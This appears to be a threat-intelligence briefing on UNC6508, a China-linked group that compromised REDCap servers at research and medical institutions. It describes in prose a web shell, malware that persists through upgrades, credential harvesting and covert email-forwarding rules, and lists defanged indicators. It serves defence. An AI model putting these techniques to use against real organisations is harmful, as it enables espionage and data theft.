A China-linked espionage group quietly burrowed into North American universities, hospitals, and military health institutions for more than a year, stealing sensitive defense and medical research before anyone noticed, according to new research from the Google Threat Intelligence Group (GTIG).
GTIG tracks the group as UNC6508 and assesses with high confidence that it is a People's Republic of China (PRC) nexus actor driven by espionage. The campaign fits a broader pattern in which China-linked groups now drive most state-backed intrusions. The earliest known break-in dates to September 2023, and the activity continued undetected into late 2025. That long, quiet dwell time echoes other Chinese operations, including the Velvet Ant intrusion that hid in a critical network for nearly a decade. Working with Mandiant Consulting, Google says it disrupted the attacker's infrastructure and notified the affected organizations.
Who was targeted
The victims read like a who's who of North American research: world renowned clinical providers, premier academic centers, military health institutions, health regulators, and professional advocacy groups across the United States and Canada. Together they employ thousands of researchers and command research budgets in the billions of dollars. The attackers' collection list was broad, spanning national security and Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, offensive cyber programs, and medical research, including a specific interest in the mosquito-borne Chikungunya virus that drove an outbreak in China's Guangdong province in 2025.
How the attack worked
The group's way in was REDCap, a web platform widely used by medical and scientific researchers to build databases and surveys. UNC6508 repeatedly hunted for internet-facing REDCap servers and probed for outdated, vulnerable versions that administrators had left running alongside current ones, a so-called downgrade attack. Once inside, the attackers planted a web shell (help.php) and, three months later, deployed custom malware that GTIG calls INFINITERED.
INFINITERED is built to survive. Rather than running as a separate program, it trojanizes legitimate REDCap files and even hijacks the software's own upgrade process so it can reinject itself into each new version. One component silently captures usernames and passwords as researchers log in, hiding the stolen credentials inside a normal-looking database table. Another opens a backdoor that watches for a secret value in a web cookie, then runs shell commands, executes database queries, and moves files on the attacker's command.
A novel email-forwarding trick
The most striking part of the campaign was how the attackers stole email. More than a year after the initial break-in, UNC6508 reused harvested credentials to seize an enterprise administrator account, then abused content compliance rules, a legitimate feature in cloud email suites that flags messages matching certain keywords. The attackers created a rule (misspelled "Patroit") that quietly BCC-forwarded any matching email to an attacker-controlled Gmail address, BebitaBarefoot774[at]gmail[.]com, creating a continuous, covert feed of stolen correspondence. GTIG says using compliance rules this way is a technique it had not previously seen from a PRC-nexus actor. To stay hidden, the group routed its traffic through US-based obfuscation networks made up of compromised routers, residential proxies, and other devices, so its activity appeared to come from inside the country.
What you should do
GTIG urges any organization running REDCap to update to the latest version and fully remove older ones, and to scan their servers for INFINITERED using the YARA rule and indicators Google published. More broadly, defenders should enforce phishing-resistant two-step verification on administrator accounts, use unique credentials across systems to blunt credential replay, and routinely audit email compliance and forwarding rules for unauthorized changes, exactly the kind of quiet abuse that let this campaign run for so long.
Indicators of compromise
Selected defanged indicators from GTIG's report: exfiltration account BebitaBarefoot774[at]gmail[.]com; admin login source 23[.]169[.]65[.]49 (a compromised ASUS router); INFINITERED backdoor SHA256 8f0158855a656b629ca76ebca565f18bc25563ded34b65d6771632c20edb68ec; credential harvester SHA256 db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136; dropper SHA256 51a57bfc9ed3eb6451c1c289607814d59e1698c666fb97ac5f694c398f23d045; web shell help.php SHA256 ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7. See the original GTIG report for the full indicator list and YARA rule.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.